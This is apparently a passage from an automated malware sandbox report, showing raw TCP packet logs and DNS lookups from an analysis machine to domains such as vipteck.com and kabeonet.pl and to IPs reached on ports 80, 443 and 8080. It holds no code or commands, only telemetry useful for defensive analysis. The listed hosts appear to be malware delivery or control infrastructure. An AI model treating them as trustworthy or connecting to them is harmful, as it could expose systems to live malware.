                                                    May 23, 2022 09:19:16.745912075 CEST44349172188.114.97.10192.168.2.22
                                                    May 23, 2022 09:19:16.745933056 CEST49172443192.168.2.22188.114.97.10
                                                    May 23, 2022 09:19:16.745955944 CEST49172443192.168.2.22188.114.97.10
                                                    May 23, 2022 09:19:16.746001959 CEST44349172188.114.97.10192.168.2.22
                                                    May 23, 2022 09:19:16.746074915 CEST49172443192.168.2.22188.114.97.10
                                                    May 23, 2022 09:19:16.746118069 CEST44349172188.114.97.10192.168.2.22
                                                    May 23, 2022 09:19:16.746164083 CEST44349172188.114.97.10192.168.2.22
                                                    May 23, 2022 09:19:16.746185064 CEST49172443192.168.2.22188.114.97.10
                                                    May 23, 2022 09:19:16.746195078 CEST44349172188.114.97.10192.168.2.22
                                                    May 23, 2022 09:19:16.746213913 CEST49172443192.168.2.22188.114.97.10
                                                    May 23, 2022 09:19:16.746238947 CEST49172443192.168.2.22188.114.97.10
                                                    May 23, 2022 09:19:16.746253967 CEST44349172188.114.97.10192.168.2.22
                                                    May 23, 2022 09:19:16.746309996 CEST49172443192.168.2.22188.114.97.10
                                                    May 23, 2022 09:19:16.746329069 CEST49172443192.168.2.22188.114.97.10
                                                    May 23, 2022 09:19:16.747224092 CEST49172443192.168.2.22188.114.97.10
                                                    May 23, 2022 09:19:16.750587940 CEST49172443192.168.2.22188.114.97.10
                                                    May 23, 2022 09:19:16.906793118 CEST44349172188.114.97.10192.168.2.22
                                                    May 23, 2022 09:19:16.906872034 CEST49172443192.168.2.22188.114.97.10
                                                    May 23, 2022 09:19:16.906975985 CEST44349172188.114.97.10192.168.2.22
                                                    May 23, 2022 09:19:16.907025099 CEST44349172188.114.97.10192.168.2.22
                                                    May 23, 2022 09:19:16.907044888 CEST49172443192.168.2.22188.114.97.10
                                                    May 23, 2022 09:19:16.907067060 CEST44349172188.114.97.10192.168.2.22
                                                    May 23, 2022 09:19:16.907083035 CEST49172443192.168.2.22188.114.97.10
                                                    May 23, 2022 09:19:16.907087088 CEST49172443192.168.2.22188.114.97.10
                                                    May 23, 2022 09:19:16.907094955 CEST49172443192.168.2.22188.114.97.10
                                                    May 23, 2022 09:19:16.907108068 CEST49172443192.168.2.22188.114.97.10
                                                    May 23, 2022 09:19:16.907414913 CEST44349172188.114.97.10192.168.2.22
                                                    May 23, 2022 09:19:16.907479048 CEST44349172188.114.97.10192.168.2.22
                                                    May 23, 2022 09:19:16.907502890 CEST49172443192.168.2.22188.114.97.10
                                                    May 23, 2022 09:19:16.907521009 CEST44349172188.114.97.10192.168.2.22
                                                    May 23, 2022 09:19:16.907538891 CEST49172443192.168.2.22188.114.97.10
                                                    May 23, 2022 09:19:16.907558918 CEST49172443192.168.2.22188.114.97.10
                                                    May 23, 2022 09:19:16.907565117 CEST44349172188.114.97.10192.168.2.22
                                                    May 23, 2022 09:19:16.907579899 CEST44349172188.114.97.10192.168.2.22
                                                    May 23, 2022 09:19:16.907603025 CEST49172443192.168.2.22188.114.97.10
                                                    May 23, 2022 09:19:16.907617092 CEST49172443192.168.2.22188.114.97.10
                                                    May 23, 2022 09:19:16.907634974 CEST44349172188.114.97.10192.168.2.22
                                                    May 23, 2022 09:19:16.907668114 CEST49172443192.168.2.22188.114.97.10
                                                    May 23, 2022 09:19:16.907681942 CEST49172443192.168.2.22188.114.97.10
                                                    May 23, 2022 09:19:16.908013105 CEST44349172188.114.97.10192.168.2.22
                                                    May 23, 2022 09:19:16.908061028 CEST44349172188.114.97.10192.168.2.22
                                                    May 23, 2022 09:19:16.908099890 CEST49172443192.168.2.22188.114.97.10
                                                    May 23, 2022 09:19:16.908119917 CEST44349172188.114.97.10192.168.2.22
                                                    May 23, 2022 09:19:16.908130884 CEST49172443192.168.2.22188.114.97.10
                                                    May 23, 2022 09:19:16.908149958 CEST44349172188.114.97.10192.168.2.22
                                                    May 23, 2022 09:19:16.908158064 CEST49172443192.168.2.22188.114.97.10
                                                    May 23, 2022 09:19:16.908166885 CEST44349172188.114.97.10192.168.2.22
                                                    May 23, 2022 09:19:16.908227921 CEST49172443192.168.2.22188.114.97.10
                                                    May 23, 2022 09:19:16.908241034 CEST44349172188.114.97.10192.168.2.22
                                                    May 23, 2022 09:19:16.908286095 CEST49172443192.168.2.22188.114.97.10
                                                    May 23, 2022 09:19:16.908318043 CEST44349172188.114.97.10192.168.2.22
                                                    May 23, 2022 09:19:16.908389091 CEST44349172188.114.97.10192.168.2.22
                                                    May 23, 2022 09:19:16.908394098 CEST49172443192.168.2.22188.114.97.10
                                                    May 23, 2022 09:19:16.908406019 CEST44349172188.114.97.10192.168.2.22
                                                    May 23, 2022 09:19:16.908438921 CEST49172443192.168.2.22188.114.97.10
                                                    May 23, 2022 09:19:16.908454895 CEST49172443192.168.2.22188.114.97.10
                                                    May 23, 2022 09:19:16.909373045 CEST49172443192.168.2.22188.114.97.10
                                                    May 23, 2022 09:19:17.066031933 CEST44349172188.114.97.10192.168.2.22
                                                    May 23, 2022 09:19:17.066150904 CEST49172443192.168.2.22188.114.97.10
                                                    May 23, 2022 09:19:17.066348076 CEST44349172188.114.97.10192.168.2.22
                                                    May 23, 2022 09:19:17.066422939 CEST49172443192.168.2.22188.114.97.10
                                                    May 23, 2022 09:19:17.066577911 CEST44349172188.114.97.10192.168.2.22
                                                    May 23, 2022 09:19:20.418688059 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.418701887 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.418713093 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.418725967 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.418736935 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.418749094 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.418759108 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.418773890 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.418785095 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.418797970 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.418812990 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.418824911 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.418833971 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.418848991 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.418859959 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.418873072 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.418884039 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.418898106 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.418906927 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.418921947 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.418934107 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.418946028 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.418956995 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.418982029 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.423826933 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.426482916 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.426511049 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.426527023 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.426544905 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.426563025 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.426578999 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.426580906 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.426598072 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.426599026 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.426604033 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.426608086 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.426618099 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.426621914 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.426635981 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.426641941 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.426655054 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.426656008 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.426672935 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.426676035 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.426686049 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.426691055 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.426712990 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.426712036 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.426726103 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.426731110 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.426748991 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.426752090 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.426764965 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.426769972 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.426783085 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.426789045 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.426806927 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.426808119 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.426817894 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.426826954 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.426843882 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.426845074 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.426853895 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.426863909 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.426881075 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.426882029 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.426889896 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.426918983 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.427186012 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.428570032 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.428596973 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.428615093 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.428631067 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.428637981 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.428648949 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.428661108 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.428664923 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.428668022 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.428675890 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.428685904 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.428702116 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.428704023 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.428714991 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.428730011 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.574546099 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.574584961 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.574615002 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.574645042 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.574673891 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.574702024 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.574731112 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.574759960 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.574801922 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.574800968 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.574829102 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.574831963 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.574831963 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.574835062 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.574855089 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.574882984 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.574913025 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.574940920 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.574940920 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.574944973 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.574970961 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.574970961 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.575001001 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.575021029 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.575030088 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.575031996 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.575062037 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.575073957 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.575098991 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.575114965 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.575119019 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.575154066 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.575176954 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.575192928 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.575215101 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.575231075 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.575237989 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.575270891 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.575297117 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.575309992 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.575311899 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.575349092 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.575371981 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.575388908 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.575412035 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.575427055 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.575443983 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.575464964 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.575495958 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.575506926 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.575514078 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.575544119 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.575544119 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.575582981 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.575597048 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.575620890 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.575634003 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.575659990 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.575663090 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.575699091 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.575710058 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.575736046 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.575737000 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.575776100 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.575784922 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.575814962 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.575815916 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.575854063 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.575865030 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.575894117 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.575905085 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.575932026 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.575932980 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.575970888 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.575983047 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.576009035 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.576009989 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.576046944 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.576061964 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.576086044 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.576091051 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.576123953 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.576136112 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.576162100 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.576165915 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.576200008 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.576215982 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.576237917 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.576256990 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.576277018 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.576282024 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.576316118 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.576327085 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.576354027 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.576354027 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.576391935 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.576404095 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.576431990 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.576433897 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.576472044 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.576489925 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.576546907 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.576558113 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.576584101 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.576585054 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.576621056 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.576641083 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.576662064 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.576664925 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.576702118 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.576730013 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.576766968 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.576781034 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.576797962 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.576805115 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.576837063 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.576869011 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.576905966 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.576947927 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.576982021 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.576984882 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.577001095 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.577023983 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.577029943 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.577064037 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.577091932 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.577100039 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.577119112 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.577138901 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.577143908 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.577178001 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.577207088 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.577219963 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.577224970 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.577260971 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.577270985 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.577300072 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.577300072 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.577351093 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.577361107 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.577373981 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.577392101 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.577419996 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.577429056 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.577446938 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.577466965 CEST8049173160.153.40.1192.168.2.22
                                                    May 23, 2022 09:19:20.577472925 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.577516079 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:19:20.578320980 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:20:04.769853115 CEST808049180173.82.82.196192.168.2.22
                                                    May 23, 2022 09:20:04.769954920 CEST808049180173.82.82.196192.168.2.22
                                                    May 23, 2022 09:20:04.770006895 CEST491808080192.168.2.22173.82.82.196
                                                    May 23, 2022 09:20:04.770030975 CEST491808080192.168.2.22173.82.82.196
                                                    May 23, 2022 09:21:14.924658060 CEST4917580192.168.2.22193.143.77.34
                                                    May 23, 2022 09:21:14.924894094 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:21:14.925209045 CEST4917180192.168.2.22188.114.97.10
                                                    May 23, 2022 09:21:14.942805052 CEST8049171188.114.97.10192.168.2.22
                                                    May 23, 2022 09:21:14.942939043 CEST4917180192.168.2.22188.114.97.10
                                                    May 23, 2022 09:21:15.302706003 CEST4917580192.168.2.22193.143.77.34
                                                    May 23, 2022 09:21:15.396284103 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:21:15.895546913 CEST4917580192.168.2.22193.143.77.34
                                                    May 23, 2022 09:21:16.207583904 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:21:17.143678904 CEST4917580192.168.2.22193.143.77.34
                                                    May 23, 2022 09:21:17.814523935 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:21:19.546293974 CEST4917580192.168.2.22193.143.77.34
                                                    May 23, 2022 09:21:21.028516054 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:21:24.351468086 CEST4917580192.168.2.22193.143.77.34
                                                    May 23, 2022 09:21:27.440609932 CEST4917380192.168.2.22160.153.40.1
                                                    May 23, 2022 09:21:33.961934090 CEST4917580192.168.2.22193.143.77.34
                                                    May 23, 2022 09:21:37.745095968 CEST491778080192.168.2.22173.82.82.196
                                                    May 23, 2022 09:21:37.745141029 CEST491778080192.168.2.22173.82.82.196
                                                    May 23, 2022 09:21:39.924000978 CEST491798080192.168.2.22173.82.82.196
                                                    May 23, 2022 09:21:39.924045086 CEST491798080192.168.2.22173.82.82.196
                                                    May 23, 2022 09:21:40.249258995 CEST4917380192.168.2.22160.153.40.1
                                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                    May 23, 2022 09:19:15.081226110 CEST | 55868 | 53 | 192.168.2.22 | 8.8.8.8
                                                    May 23, 2022 09:19:15.102648973 CEST | 53 | 55868 | 8.8.8.8 | 192.168.2.22
                                                    May 23, 2022 09:19:19.279834032 CEST | 49688 | 53 | 192.168.2.22 | 8.8.8.8
                                                    May 23, 2022 09:19:19.299406052 CEST | 53 | 49688 | 8.8.8.8 | 192.168.2.22
                                                    May 23, 2022 09:19:24.631736994 CEST | 58836 | 53 | 192.168.2.22 | 8.8.8.8
                                                    May 23, 2022 09:19:24.652940989 CEST | 53 | 58836 | 8.8.8.8 | 192.168.2.22
                                                    May 23, 2022 09:19:28.953943014 CEST | 50134 | 53 | 192.168.2.22 | 8.8.8.8
                                                    May 23, 2022 09:19:28.971402884 CEST | 53 | 50134 | 8.8.8.8 | 192.168.2.22
                                                    May 23, 2022 09:19:31.081562042 CEST | 55275 | 53 | 192.168.2.22 | 8.8.8.8
                                                    May 23, 2022 09:19:31.121392012 CEST | 53 | 55275 | 8.8.8.8 | 192.168.2.22
                                                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                                    May 23, 2022 09:19:15.081226110 CEST | 192.168.2.22 | 8.8.8.8 | 0x2ebc | Standard query (0) | vipteck.com | A (IP address) | IN (0x0001)
                                                    May 23, 2022 09:19:19.279834032 CEST | 192.168.2.22 | 8.8.8.8 | 0xfee1 | Standard query (0) | salledemode.com | A (IP address) | IN (0x0001)
                                                    May 23, 2022 09:19:24.631736994 CEST | 192.168.2.22 | 8.8.8.8 | 0xf9b | Standard query (0) | airliftlimo.com | A (IP address) | IN (0x0001)
                                                    May 23, 2022 09:19:28.953943014 CEST | 192.168.2.22 | 8.8.8.8 | 0x5ee0 | Standard query (0) | kabeonet.pl | A (IP address) | IN (0x0001)
                                                    May 23, 2022 09:19:31.081562042 CEST | 192.168.2.22 | 8.8.8.8 | 0x852 | Standard query (0) | www.kabeonet.pl | A (IP address) | IN (0x0001)
                                                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                                    May 23, 2022 09:19:15.102648973 CEST | 8.8.8.8 | 192.168.2.22 | 0x2ebc | No error (0) | vipteck.com | | 188.114.97.10 | A (IP address) | IN (0x0001)
